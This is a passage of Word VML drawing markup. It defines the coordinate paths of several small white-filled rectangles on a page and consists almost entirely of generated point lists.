        <v:shape style="position:absolute;left:4690;top:11310;width:130;height:270" coordorigin="4690,11310" coordsize="130,270" path="m4706,11325l4706,11325,4706,11325,4706,11325,4706,11325,4706,11325,4706,11325,4706,11325,4706,11325,4706,11325,4706,11325,4706,11325,4706,11325,4706,11325,4707,11325,4707,11325,4707,11325,4707,11325,4707,11325,4707,11325,4707,11325,4707,11325,4707,11325,4707,11325,4707,11325,4707,11325,4707,11325,4708,11325,4708,11325,4708,11325,4708,11325,4708,11325,4708,11325,4709,11325,4709,11325,4709,11325,4709,11325,4710,11325,4710,11325,4710,11325,4711,11325,4711,11325,4711,11325,4712,11325,4712,11325,4712,11325,4713,11325,4713,11325,4714,11325,4714,11325,4715,11325,4715,11325,4716,11325,4716,11325,4717,11325,4718,11325,4718,11325,4719,11325,4720,11325,4720,11325,4721,11325,4722,11325,4723,11325,4723,11325,4724,11325,4725,11325,4726,11325,4727,11325,4728,11325,4729,11325,4730,11325,4731,11325,4732,11325,4733,11325,4734,11325,4735,11325,4736,11325,4738,11325,4739,11325,4740,11325,4741,11325,4743,11325,4744,11325,4746,11325,4747,11325,4749,11325,4750,11325,4752,11325,4753,11325,4755,11325,4757,11325,4758,11325,4760,11325,4762,11325,4764,11325,4766,11325,4767,11325,4769,11325,4771,11325,4773,11325,4776,11325,4778,11325,4780,11325,4782,11325,4784,11325,4787,11325,4789,11325,4791,11325,4794,11325,4796,11325,4799,11325,4801,11325,4804,11325,4806,11325,4809,11325,4812,11325,4815,11325,4818,11325,4820,11325,4823,11325,4826,11325,4826,11325,4826,11325,4826,11325,4826,11325,4826,11325,4826,11325,4826,11325,4826,11325,4826,11325,4826,11325,4826,11325,4826,11325,4826,11325,4826,11325,4826,11325,4826,11325,4826,11325,4826,11325,4826,11326,4826,11326,4826,11326,4826,11326,4826,11326,4826,11327,4826,11327,4826,11327,4826,11327,4826,11328,4826,11328,4826,11328,4826,11329,4826,11329,4826,11330,4826,11330,4826,11331,4826,11331,4826,11332,4826,11332,4826,11333,4826,11334,4826,11334,4826,11335,4826,11336,4826,11337,4826,11338,4826,11339,4826,11339,4826,11340,4826,11341,4826,11343,4826,11344,4826,11345,4826,11346,4826,11347,4826,11349,4826,11350,4826,11351,4826,11353,4826,11354,4826,11356,4826,11357,4826,11359,4826,11361,4826,11363,4826,11364,4826,11366,4826,11368,4826,11370,4826,11372,4826,11374,4826,11377,4826,11379,4826,11381,4826,11384,4826,11386,4826,11389,4826,11391,4826,11394,4826,11397,4826,11399,4826,11402,4826,11405,4826,11408,4826,11411,4826,11414,4826,11418,4826,11421,4826,11424,4826,11428,4826,11431,4826,11435,4826,11439,4826,11443,4826,11446,4826,11450,4826,11455,4826,11459,4826,11463,4826,11467,4826,11472,4826,11476,4826,11481,4826,11485,4826,11490,4826,11495,4826,11500,4826,11505,4826,11510,4826,11515,4826,11521,4826,11526,4826,11532,4826,11537,4826,11543,4826,11549,4826,11555,4826,11561,4826,11567,4826,11573,4826,11580,4826,11580,4826,11580,4826,11580,4826,11580,4826,11580,4826,11580,4826,11580,4826,11580,4826,11580,4826,11580,4826,11580,4826,11580,4826,11580,4826,11580,4826,11580,4826,11580,4826,11580,4826,11580,4826,11580,4826,11580,4826,11580,4826,11580,4826,11580,4826,11580,4825,11580,4825,11580,4825,11580,4825,11580,4825,11580,4825,11580,4825,11580,4824,11580,4824,11580,4824,11580,4824,11580,4823,11580,4823,11580,4823,11580,4823,11580,4822,11580,4822,11580,4822,11580,4821,11580,4821,11580,4820,11580,4820,11580,4819,11580,4819,11580,4819,11580,4818,11580,4818,11580,4817,11580,4816,11580,4816,11580,4815,11580,4815,11580,4814,11580,4813,11580,4813,11580,4812,11580,4811,11580,4810,11580,4809,11580,4809,11580,4808,11580,4807,11580,4806,11580,4805,11580,4804,11580,4803,11580,4802,11580,4801,11580,4800,11580,4799,11580,4798,11580,4796,11580,4795,11580,4794,11580,4793,11580,4791,11580,4790,11580,4789,11580,4787,11580,4786,11580,4784,11580,4783,11580,4781,11580,4780,11580,4778,11580,4776,11580,4774,11580,4773,11580,4771,11580,4769,11580,4767,11580,4765,11580,4763,11580,4761,11580,4759,11580,4757,11580,4755,11580,4753,11580,4751,11580,4749,11580,4746,11580,4744,11580,4742,11580,4739,11580,4737,11580,4734,11580,4732,11580,4729,11580,4726,11580,4724,11580,4721,11580,4718,11580,4715,11580,4712,11580,4709,11580,4706,11580,4706,11580,4706,11580,4706,11580,4706,11580,4706,11580,4706,11580,4706,11580,4706,11580,4706,11580,4706,11580,4706,11580,4706,11580,4706,11580,4706,11580,4706,11579,4706,11579,4706,11579,4706,11579,4706,11579,4706,11579,4706,11579,4706,11578,4706,11578,4706,11578,4706,11578,4706,11577,4706,11577,4706,11577,4706,11577,4706,11576,4706,11576,4706,11575,4706,11575,4706,11574,4706,11574,4706,11573,4706,11573,4706,11572,4706,11572,4706,11571,4706,11570,4706,11569,4706,11569,4706,11568,4706,11567,4706,11566,4706,11565,4706,11564,4706,11563,4706,11562,4706,11561,4706,11560,4706,11559,4706,11557,4706,11556,4706,11555,4706,11553,4706,11552,4706,11550,4706,11549,4706,11547,4706,11545,4706,11544,4706,11542,4706,11540,4706,11538,4706,11536,4706,11534,4706,11532,4706,11530,4706,11528,4706,11526,4706,11523,4706,11521,4706,11518,4706,11516,4706,11513,4706,11511,4706,11508,4706,11505,4706,11502,4706,11499,4706,11496,4706,11493,4706,11490,4706,11487,4706,11484,4706,11480,4706,11477,4706,11473,4706,11469,4706,11466,4706,11462,4706,11458,4706,11454,4706,11450,4706,11446,4706,11442,4706,11437,4706,11433,4706,11428,4706,11424,4706,11419,4706,11414,4706,11410,4706,11405,4706,11400,4706,11394,4706,11389,4706,11384,4706,11378,4706,11373,4706,11367,4706,11361,4706,11356,4706,11350,4706,11344,4706,11337,4706,11331,4706,11325e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:270.500pt;margin-top:584.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5410,11690" coordsize="130,250">
        <v:shape style="position:absolute;left:5410;top:11690;width:130;height:250" coordorigin="5410,11690" coordsize="130,250" path="m5427,11700l5427,11700,5427,11700,5427,11700,5427,11700,5427,11700,5427,11700,5427,11700,5427,11700,5427,11700,5427,11700,5427,11700,5427,11700,5427,11700,5427,11700,5427,11700,5427,11700,5427,11700,5427,11700,5427,11700,5427,11700,5427,11700,5427,11700,5427,11700,5428,11700,5428,11700,5428,11700,5428,11700,5428,11700,5428,11700,5428,11700,5429,11700,5429,11700,5429,11700,5429,11700,5430,11700,5430,11700,5430,11700,5430,11700,5431,11700,5431,11700,5431,11700,5432,11700,5432,11700,5432,11700,5433,11700,5433,11700,5434,11700,5434,11700,5435,11700,5435,11700,5436,11700,5436,11700,5437,11700,5437,11700,5438,11700,5439,11700,5439,11700,5440,11700,5441,11700,5441,11700,5442,11700,5443,11700,5444,11700,5445,11700,5445,11700,5446,11700,5447,11700,5448,11700,5449,11700,5450,11700,5451,11700,5452,11700,5453,11700,5454,11700,5456,11700,5457,11700,5458,11700,5459,11700,5461,11700,5462,11700,5463,11700,5465,11700,5466,11700,5467,11700,5469,11700,5470,11700,5472,11700,5474,11700,5475,11700,5477,11700,5479,11700,5480,11700,5482,11700,5484,11700,5486,11700,5488,11700,5490,11700,5492,11700,5494,11700,5496,11700,5498,11700,5500,11700,5502,11700,5505,11700,5507,11700,5509,11700,5512,11700,5514,11700,5516,11700,5519,11700,5522,11700,5524,11700,5527,11700,5530,11700,5532,11700,5535,11700,5538,11700,5541,11700,5544,11700,5547,11700,5547,11700,5547,11700,5547,11700,5547,11700,5547,11700,5547,11700,5547,11700,5547,11700,5547,11700,5547,11700,5547,11700,5547,11700,5547,11700,5547,11700,5547,11700,5547,11700,5547,11701,5547,11701,5547,11701,5547,11701,5547,11701,5547,11701,5547,11702,5547,11702,5547,11702,5547,11702,5547,11703,5547,11703,5547,11703,5547,11704,5547,11704,5547,11704,5547,11705,5547,11705,5547,11706,5547,11706,5547,11707,5547,11708,5547,11708,5547,11709,5547,11710,5547,11710,5547,11711,5547,11712,5547,11713,5547,11714,5547,11715,5547,11716,5547,11717,5547,11718,5547,11719,5547,11720,5547,11721,5547,11722,5547,11724,5547,11725,5547,11726,5547,11728,5547,11729,5547,11731,5547,11733,5547,11734,5547,11736,5547,11738,5547,11740,5547,11741,5547,11743,5547,11745,5547,11747,5547,11750,5547,11752,5547,11754,5547,11756,5547,11759,5547,11761,5547,11764,5547,11766,5547,11769,5547,11772,5547,11775,5547,11777,5547,11780,5547,11783,5547,11786,5547,11790,5547,11793,5547,11796,5547,11800,5547,11803,5547,11807,5547,11810,5547,11814,5547,11818,5547,11822,5547,11826,5547,11830,5547,11834,5547,11838,5547,11842,5547,11847,5547,11851,5547,11856,5547,11861,5547,11865,5547,11870,5547,11875,5547,11880,5547,11885,5547,11891,5547,11896,5547,11901,5547,11907,5547,11913,5547,11918,5547,11924,5547,11930,5547,11936,5547,11942,5547,11949,5547,11955,5547,11955,5547,11955,5547,11955,5547,11955,5547,11955,5547,11955,5547,11955,5547,11955,5547,11955,5547,11955,5547,11955,5547,11955,5547,11955,5547,11955,5547,11955,5547,11955,5547,11955,5546,11955,5546,11955,5546,11955,5546,11955,5546,11955,5546,11955,5546,11955,5546,11955,5546,11955,5546,11955,5545,11955,5545,11955,5545,11955,5545,11955,5545,11955,5544,11955,5544,11955,5544,11955,5544,11955,5543,11955,5543,11955,5543,11955,5543,11955,5542,11955,5542,11955,5542,11955,5541,11955,5541,11955,5540,11955,5540,11955,5539,11955,5539,11955,5538,11955,5538,11955,5537,11955,5537,11955,5536,11955,5536,11955,5535,11955,5534,11955,5534,11955,5533,11955,5532,11955,5531,11955,5531,11955,5530,11955,5529,11955,5528,11955,5527,11955,5526,11955,5525,11955,5524,11955,5523,11955,5522,11955,5521,11955,5520,11955,5519,11955,5518,11955,5517,11955,5516,11955,5514,11955,5513,11955,5512,11955,5510,11955,5509,11955,5508,11955,5506,11955,5505,11955,5503,11955,5501,11955,5500,11955,5498,11955,5497,11955,5495,11955,5493,11955,5491,11955,5489,11955,5488,11955,5486,11955,5484,11955,5482,11955,5480,11955,5478,11955,5476,11955,5473,11955,5471,11955,5469,11955,5467,11955,5464,11955,5462,11955,5460,11955,5457,11955,5455,11955,5452,11955,5449,11955,5447,11955,5444,11955,5441,11955,5438,11955,5436,11955,5433,11955,5430,11955,5427,11955,5427,11955,5427,11955,5427,11955,5427,11955,5427,11955,5427,11955,5427,11955,5427,11955,5427,11955,5427,11955,5427,11955,5427,11955,5427,11955,5427,11955,5427,11955,5427,11955,5427,11954,5427,11954,5427,11954,5427,11954,5427,11954,5427,11954,5427,11953,5427,11953,5427,11953,5427,11953,5427,11952,5427,11952,5427,11952,5427,11951,5427,11951,5427,11951,5427,11950,5427,11950,5427,11949,5427,11949,5427,11948,5427,11947,5427,11947,5427,11946,5427,11945,5427,11945,5427,11944,5427,11943,5427,11942,5427,11941,5427,11940,5427,11939,5427,11938,5427,11937,5427,11936,5427,11935,5427,11934,5427,11932,5427,11931,5427,11930,5427,11928,5427,11927,5427,11925,5427,11924,5427,11922,5427,11921,5427,11919,5427,11917,5427,11915,5427,11913,5427,11911,5427,11909,5427,11907,5427,11905,5427,11903,5427,11901,5427,11899,5427,11896,5427,11894,5427,11891,5427,11889,5427,11886,5427,11883,5427,11880,5427,11878,5427,11875,5427,11872,5427,11868,5427,11865,5427,11862,5427,11859,5427,11855,5427,11852,5427,11848,5427,11845,5427,11841,5427,11837,5427,11833,5427,11829,5427,11825,5427,11821,5427,11817,5427,11813,5427,11808,5427,11804,5427,11799,5427,11794,5427,11790,5427,11785,5427,11780,5427,11775,5427,11770,5427,11764,5427,11759,5427,11754,5427,11748,5427,11742,5427,11737,5427,11731,5427,11725,5427,11719,5427,11713,5427,11706,5427,11700e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:276.500pt;margin-top:602.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5530,12050" coordsize="130,250">
        <v:shape style="position:absolute;left:5530;top:12050;width:130;height:250" coordorigin="5530,12050" coordsize="130,250" path="m5547,12060l5547,12060,5547,12060,5547,12060,5547,12060,5547,12060,5547,12060,5547,12060,5547,12060,5547,12060,5547,12060,5547,12060,5547,12060,5547,12060,5547,12060,5547,12060,5547,12060,5547,12060,5547,12060,5547,12060,5547,12060,5547,12060,5547,12060,5548,12060,5548,12060,5548,12060,5548,12060,5548,12060,5548,12060,5548,12060,5549,12060,5549,12060,5549,12060,5549,12060,5549,12060,5550,12060,5550,12060,5550,12060,5550,12060,5551,12060,5551,12060,5551,12060,5552,12060,5552,12060,5552,12060,5553,12060,5553,12060,5554,12060,5554,12060,5555,12060,5555,12060,5556,12060,5556,12060,5557,12060,5557,12060,5558,12060,5559,12060,5559,12060,5560,12060,5561,12060,5561,12060,5562,12060,5563,12060,5564,12060,5565,12060,5565,12060,5566,12060,5567,12060,5568,12060,5569,12060,5570,12060,5571,12060,5572,12060,5573,12060,5575,12060,5576,12060,5577,12060,5578,12060,5579,12060,5581,12060,5582,12060,5583,12060,5585,12060,5586,12060,5588,12060,5589,12060,5591,12060,5592,12060,5594,12060,5595,12060,5597,12060,5599,12060,5600,12060,5602,12060,5604,12060,5606,12060,5608,12060,5610,12060,5612,12060,5614,12060,5616,12060,5618,12060,5620,12060,5622,12060,5625,12060,5627,12060,5629,12060,5632,12060,5634,12060,5637,12060,5639,12060,5642,12060,5644,12060,5647,12060,5650,12060,5652,12060,5655,12060,5658,12060,5661,12060,5664,12060,5667,12060,5667,12060,5667,12060,5667,12060,5667,12060,5667,12060,5667,12060,5667,12060,5667,12060,5667,12060,5667,12060,5667,12060,5667,12060,5667,12060,5667,12060,5667,12060,5667,12061,5667,12061,5667,12061,5667,12061,5667,12061,5667,12061,5667,12061,5667,12062,5667,12062,5667,12062,5667,12062,5667,12063,5667,12063,5667,12063,5667,12064,5667,12064,5667,12065,5667,12065,5667,12066,5667,12066,5667,12067,5667,12067,5667,12068,5667,12068,5667,12069,5667,12070,5667,12071,5667,12071,5667,12072,5667,12073,5667,12074,5667,12075,5667,12076,5667,12077,5667,12078,5667,12079,5667,12080,5667,12081,5667,12083,5667,12084,5667,12085,5667,12087,5667,12088,5667,12090,5667,12091,5667,12093,5667,12094,5667,12096,5667,12098,5667,12100,5667,12102,5667,12104,5667,12106,5667,12108,5667,12110,5667,12112,5667,12114,5667,12117,5667,12119,5667,12121,5667,12124,5667,12127,5667,12129,5667,12132,5667,12135,5667,12138,5667,12141,5667,12144,5667,12147,5667,12150,5667,12153,5667,12156,5667,12160,5667,12163,5667,12167,5667,12170,5667,12174,5667,12178,5667,12182,5667,12186,5667,12190,5667,12194,5667,12198,5667,12203,5667,12207,5667,12211,5667,12216,5667,12221,5667,12226,5667,12230,5667,12235,5667,12240,5667,12246,5667,12251,5667,12256,5667,12262,5667,12267,5667,12273,5667,12279,5667,12284,5667,12290,5667,12296,5667,12303,5667,12309,5667,12315,5667,12315,5667,12315,5667,12315,5667,12315,5667,12315,5667,12315,5667,12315,5667,12315,5667,12315,5667,12315,5667,12315,5667,12315,5667,12315,5667,12315,5667,12315,5667,12315,5667,12315,5667,12315,5666,12315,5666,12315,5666,12315,5666,12315,5666,12315,5666,12315,5666,12315,5666,12315,5666,12315,5665,12315,5665,12315,5665,12315,5665,12315,5665,12315,5665,12315,5664,12315,5664,12315,5664,12315,5664,12315,5663,12315,5663,12315,5663,12315,5662,12315,5662,12315,5662,12315,5661,12315,5661,12315,5660,12315,5660,12315,5659,12315,5659,12315,5658,12315,5658,12315,5657,12315,5657,12315,5656,12315,5656,12315,5655,12315,5654,12315,5654,12315,5653,12315,5652,12315,5651,12315,5651,12315,5650,12315,5649,12315,5648,12315,5647,12315,5646,12315,5645,12315,5644,12315,5643,12315,5642,12315,5641,12315,5640,12315,5639,12315,5638,12315,5637,12315,5636,12315,5634,12315,5633,12315,5632,12315,5630,12315,5629,12315,5628,12315,5626,12315,5625,12315,5623,12315,5622,12315,5620,12315,5618,12315,5617,12315,5615,12315,5613,12315,5611,12315,5610,12315,5608,12315,5606,12315,5604,12315,5602,12315,5600,12315,5598,12315,5596,12315,5593,12315,5591,12315,5589,12315,5587,12315,5584,12315,5582,12315,5580,12315,5577,12315,5575,12315,5572,12315,5569,12315,5567,12315,5564,12315,5561,12315,5558,12315,5556,12315,5553,12315,5550,12315,5547,12315,5547,12315,5547,12315,5547,12315,5547,12315,5547,12315,5547,12315,5547,12315,5547,12315,5547,12315,5547,12315,5547,12315,5547,12315,5547,12315,5547,12315,5547,12315,5547,12315,5547,12315,5547,12314,5547,12314,5547,12314,5547,12314,5547,12314,5547,12314,5547,12313,5547,12313,5547,12313,5547,12313,5547,12312,5547,12312,5547,12312,5547,12311,5547,12311,5547,12310,5547,12310,5547,12309,5547,12309,5547,12308,5547,12308,5547,12307,5547,12306,5547,12306,5547,12305,5547,12304,5547,12303,5547,12302,5547,12301,5547,12300,5547,12299,5547,12298,5547,12297,5547,12296,5547,12295,5547,12294,5547,12293,5547,12291,5547,12290,5547,12289,5547,12287,5547,12286,5547,12284,5547,12283,5547,12281,5547,12279,5547,12277,5547,12276,5547,12274,5547,12272,5547,12270,5547,12268,5547,12265,5547,12263,5547,12261,5547,12259,5547,12256,5547,12254,5547,12251,5547,12249,5547,12246,5547,12243,5547,12241,5547,12238,5547,12235,5547,12232,5547,12229,5547,12225,5547,12222,5547,12219,5547,12216,5547,12212,5547,12208,5547,12205,5547,12201,5547,12197,5547,12193,5547,12189,5547,12185,5547,12181,5547,12177,5547,12173,5547,12168,5547,12164,5547,12159,5547,12155,5547,12150,5547,12145,5547,12140,5547,12135,5547,12130,5547,12124,5547,12119,5547,12114,5547,12108,5547,12103,5547,12097,5547,12091,5547,12085,5547,12079,5547,12073,5547,12066,5547,12060e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:318.500pt;margin-top:620.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6370,12410" coordsize="130,270">
        <v:shape style="position:absolute;left:6370;top:12410;width:130;height:270" coordorigin="6370,12410" coordsize="130,270" path="m6387,12435l6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6388,12435,6388,12435,6388,12435,6388,12435,6388,12435,6388,12435,6388,12435,6388,12435,6388,12435,6388,12435,6388,12435,6389,12435,6389,12435,6389,12435,6389,12435,6389,12435,6390,12435,6390,12435,6390,12435,6390,12435,6391,12435,6391,12435,6391,12435,6391,12435,6392,12435,6392,12435,6392,12435,6393,12435,6393,12435,6394,12435,6394,12435,6395,12435,6395,12435,6396,12435,6396,12435,6397,12435,6397,12435,6398,12435,6398,12435,6399,12435,6400,12435,6400,12435,6401,12435,6402,12435,6403,12435,6403,12435,6404,12435,6405,12435,6406,12435,6407,12435,6408,12435,6409,12435,6410,12435,6411,12435,6412,12435,6413,12435,6414,12435,6415,12435,6416,12435,6417,12435,6418,12435,6420,12435,6421,12435,6422,12435,6424,12435,6425,12435,6427,12435,6428,12435,6429,12435,6431,12435,6433,12435,6434,12435,6436,12435,6437,12435,6439,12435,6441,12435,6443,12435,6445,12435,6446,12435,6448,12435,6450,12435,6452,12435,6454,12435,6456,12435,6458,12435,6461,12435,6463,12435,6465,12435,6467,12435,6470,12435,6472,12435,6474,12435,6477,12435,6479,12435,6482,12435,6485,12435,6487,12435,6490,12435,6493,12435,6496,12435,6498,12435,6501,12435,6504,12435,6507,12435,6507,12435,6507,12435,6507,12435,6507,12435,6507,12435,6507,12435,6507,12435,6507,12435,6507,12435,6507,12435,6507,12435,6507,12435,6507,12436,6507,12436,6507,12436,6507,12436,6507,12436,6507,12436,6507,12436,6507,12436,6507,12436,6507,12437,6507,12437,6507,12437,6507,12437,6507,12438,6507,12438,6507,12438,6507,12439,6507,12439,6507,12439,6507,12440,6507,12440,6507,12441,6507,12441,6507,12442,6507,12442,6507,12443,6507,12444,6507,12444,6507,12445,6507,12446,6507,12446,6507,12447,6507,12448,6507,12449,6507,12450,6507,12451,6507,12452,6507,12453,6507,12454,6507,12455,6507,12457,6507,12458,6507,12459,6507,12460,6507,12462,6507,12463,6507,12465,6507,12466,6507,12468,6507,12470,6507,12471,6507,12473,6507,12475,6507,12477,6507,12479,6507,12481,6507,12483,6507,12485,6507,12487,6507,12489,6507,12492,6507,12494,6507,12497,6507,12499,6507,12502,6507,12504,6507,12507,6507,12510,6507,12513,6507,12516,6507,12519,6507,12522,6507,12525,6507,12528,6507,12532,6507,12535,6507,12538,6507,12542,6507,12546,6507,12549,6507,12553,6507,12557,6507,12561,6507,12565,6507,12569,6507,12573,6507,12578,6507,12582,6507,12587,6507,12591,6507,12596,6507,12601,6507,12606,6507,12611,6507,12616,6507,12621,6507,12626,6507,12631,6507,12637,6507,12642,6507,12648,6507,12654,6507,12660,6507,12666,6507,12672,6507,12678,6507,12684,6507,12690,6507,12690,6507,12690,6507,12690,6507,12690,6507,12690,6507,12690,6507,12690,6507,12690,6507,12690,6507,12690,6507,12690,6507,12690,6507,12690,6507,12690,6507,12690,6507,12690,6507,12690,6507,12690,6507,12690,6507,12690,6507,12690,6507,12690,6507,12690,6506,12690,6506,12690,6506,12690,6506,12690,6506,12690,6506,12690,6506,12690,6505,12690,6505,12690,6505,12690,6505,12690,6504,12690,6504,12690,6504,12690,6504,12690,6503,12690,6503,12690,6503,12690,6502,12690,6502,12690,6502,12690,6501,12690,6501,12690,6500,12690,6500,12690,6499,12690,6499,12690,6498,12690,6498,12690,6497,12690,6497,12690,6496,12690,6495,12690,6495,12690,6494,12690,6493,12690,6493,12690,6492,12690,6491,12690,6490,12690,6489,12690,6489,12690,6488,12690,6487,12690,6486,12690,6485,12690,6484,12690,6483,12690,6482,12690,6481,12690,6480,12690,6478,12690,6477,12690,6476,12690,6475,12690,6473,12690,6472,12690,6471,12690,6469,12690,6468,12690,6467,12690,6465,12690,6464,12690,6462,12690,6460,12690,6459,12690,6457,12690,6455,12690,6454,12690,6452,12690,6450,12690,6448,12690,6446,12690,6444,12690,6442,12690,6440,12690,6438,12690,6436,12690,6434,12690,6432,12690,6429,12690,6427,12690,6425,12690,6422,12690,6420,12690,6418,12690,6415,12690,6412,12690,6410,12690,6407,12690,6404,12690,6402,12690,6399,12690,6396,12690,6393,12690,6390,12690,6387,12690,6387,12690,6387,12690,6387,12690,6387,12690,6387,12690,6387,12690,6387,12690,6387,12690,6387,12690,6387,12690,6387,12690,6387,12690,6387,12690,6387,12690,6387,12690,6387,12690,6387,12690,6387,12690,6387,12690,6387,12689,6387,12689,6387,12689,6387,12689,6387,12689,6387,12688,6387,12688,6387,12688,6387,12687,6387,12687,6387,12687,6387,12686,6387,12686,6387,12685,6387,12685,6387,12684,6387,12684,6387,12683,6387,12683,6387,12682,6387,12681,6387,12681,6387,12680,6387,12679,6387,12678,6387,12677,6387,12677,6387,12676,6387,12675,6387,12674,6387,12673,6387,12671,6387,12670,6387,12669,6387,12668,6387,12667,6387,12665,6387,12664,6387,12662,6387,12661,6387,12659,6387,12658,6387,12656,6387,12654,6387,12653,6387,12651,6387,12649,6387,12647,6387,12645,6387,12643,6387,12641,6387,12638,6387,12636,6387,12634,6387,12631,6387,12629,6387,12627,6387,12624,6387,12621,6387,12619,6387,12616,6387,12613,6387,12610,6387,12607,6387,12604,6387,12601,6387,12597,6387,12594,6387,12591,6387,12587,6387,12584,6387,12580,6387,12576,6387,12573,6387,12569,6387,12565,6387,12561,6387,12556,6387,12552,6387,12548,6387,12543,6387,12539,6387,12534,6387,12530,6387,12525,6387,12520,6387,12515,6387,12510,6387,12505,6387,12500,6387,12494,6387,12489,6387,12483,6387,12478,6387,12472,6387,12466,6387,12460,6387,12454,6387,12448,6387,12442,6387,12435e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:312.500pt;margin-top:638.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6250,12770" coordsize="130,270">
        <v:shape style="position:absolute;left:6250;top:12770;width:130;height:270" coordorigin="6250,12770" coordsize="130,270" path="m6267,12795l6267,12795,6267,12795,6267,12795,6267,12795,6267,12795,6267,12795,6267,12795,6267,12795,6267,12795,6267,12795,6267,12795,6267,12795,6267,12795,6267,12795,6267,12795,6267,12795,6267,12795,6268,12795,6268,12795,6268,12795,6268,12795,6268,12795,6268,12795,6268,12795,6268,12795,6268,12795,6268,12795,6269,12795,6269,12795,6269,12795,6269,12795,6269,12795,6269,12795,6270,12795,6270,12795,6270,12795,6270,12795,6271,12795,6271,12795,6271,12795,6272,12795,6272,12795,6272,12795,6273,12795,6273,12795,6274,12795,6274,12795,6275,12795,6275,12795,6276,12795,6276,12795,6277,12795,6277,12795,6278,12795,6278,12795,6279,12795,6280,12795,6280,12795,6281,12795,6282,12795,6283,12795,6283,12795,6284,12795,6285,12795,6286,12795,6287,12795,6288,12795,6289,12795,6290,12795,6291,12795,6292,12795,6293,12795,6294,12795,6295,12795,6296,12795,6297,12795,6298,12795,6300,12795,6301,12795,6302,12795,6304,12795,6305,12795,6306,12795,6308,12795,6309,12795,6311,12795,6312,12795,6314,12795,6316,12795,6317,12795,6319,12795,6321,12795,6323,12795,6324,12795,6326,12795,6328,12795,6330,12795,6332,12795,6334,12795,6336,12795,6338,12795,6341,12795,6343,12795,6345,12795,6347,12795,6350,12795,6352,12795,6354,12795,6357,12795,6359,12795,6362,12795,6365,12795,6367,12795,6370,12795,6373,12795,6376,12795,6378,12795,6381,12795,6384,12795,6387,12795,6387,12795,6387,12795,6387,12795,6387,12795,6387,12795,6387,12795,6387,12795,6387,12795,6387,12796,6387,12796,6387,12796,6387,12796,6387,12796,6387,12796,6387,12796,6387,12796,6387,12796,6387,12796,6387,12796,6387,12796,6387,12797,6387,12797,6387,12797,6387,12797,6387,12798,6387,12798,6387,12798,6387,12798,6387,12799,6387,12799,6387,12800,6387,12800,6387,12800,6387,12801,6387,12801,6387,12802,6387,12803,6387,12803,6387,12804,6387,12804,6387,12805,6387,12806,6387,12807,6387,12807,6387,12808,6387,12809,6387,12810,6387,12811,6387,12812,6387,12813,6387,12814,6387,12816,6387,12817,6387,12818,6387,12819,6387,12821,6387,12822,6387,12823,6387,12825,6387,12827,6387,12828,6387,12830,6387,12832,6387,12833,6387,12835,6387,12837,6387,12839,6387,12841,6387,12843,6387,12845,6387,12847,6387,12850,6387,12852,6387,12854,6387,12857,6387,12859,6387,12862,6387,12865,6387,12867,6387,12870,6387,12873,6387,12876,6387,12879,6387,12882,6387,12885,6387,12888,6387,12892,6387,12895,6387,12899,6387,12902,6387,12906,6387,12910,6387,12913,6387,12917,6387,12921,6387,12925,6387,12929,6387,12934,6387,12938,6387,12942,6387,12947,6387,12951,6387,12956,6387,12961,6387,12966,6387,12971,6387,12976,6387,12981,6387,12986,6387,12992,6387,12997,6387,13003,6387,13008,6387,13014,6387,13020,6387,13026,6387,13032,6387,13038,6387,13044,6387,13051,6387,13051,6387,13051,6387,13051,6387,13051,6387,13051,6387,13051,6387,13051,6387,13051,6387,13051,6387,13051,6387,13051,6387,13051,6387,13051,6387,13051,6387,13051,6387,13051,6387,13051,6387,13051,6387,13051,6387,13051,6387,13051,6387,13051,6386,13051,6386,13051,6386,13051,6386,13051,6386,13051,6386,13051,6386,13051,6385,13051,6385,13051,6385,13051,6385,13051,6385,13051,6384,13051,6384,13051,6384,13051,6384,13051,6383,13051,6383,13051,6383,13051,6382,13051,6382,13051,6382,13051,6381,13051,6381,13051,6380,13051,6380,13051,6379,13051,6379,13051,6378,13051,6378,13051,6377,13051,6377,13051,6376,13051,6375,13051,6375,13051,6374,13051,6373,13051,6373,13051,6372,13051,6371,13051,6370,13051,6369,13051,6369,13051,6368,13051,6367,13051,6366,13051,6365,13051,6364,13051,6363,13051,6362,13051,6361,13051,6360,13051,6358,13051,6357,13051,6356,13051,6355,13051,6353,13051,6352,13051,6351,13051,6349,13051,6348,13051,6346,13051,6345,13051,6343,13051,6342,13051,6340,13051,6339,13051,6337,13051,6335,13051,6334,13051,6332,13051,6330,13051,6328,13051,6326,13051,6324,13051,6322,13051,6320,13051,6318,13051,6316,13051,6314,13051,6312,13051,6309,13051,6307,13051,6305,13051,6302,13051,6300,13051,6297,13051,6295,13051,6292,13051,6290,13051,6287,13051,6284,13051,6282,13051,6279,13051,6276,13051,6273,13051,6270,13051,6267,13051,6267,13051,6267,13051,6267,13051,6267,13051,6267,13051,6267,13051,6267,13051,6267,13051,6267,13050,6267,13050,6267,13050,6267,13050,6267,13050,6267,13050,6267,13050,6267,13050,6267,13050,6267,13050,6267,13050,6267,13050,6267,13049,6267,13049,6267,13049,6267,13049,6267,13048,6267,13048,6267,13048,6267,13048,6267,13047,6267,13047,6267,13046,6267,13046,6267,13046,6267,13045,6267,13045,6267,13044,6267,13044,6267,13043,6267,13042,6267,13042,6267,13041,6267,13040,6267,13039,6267,13039,6267,13038,6267,13037,6267,13036,6267,13035,6267,13034,6267,13033,6267,13032,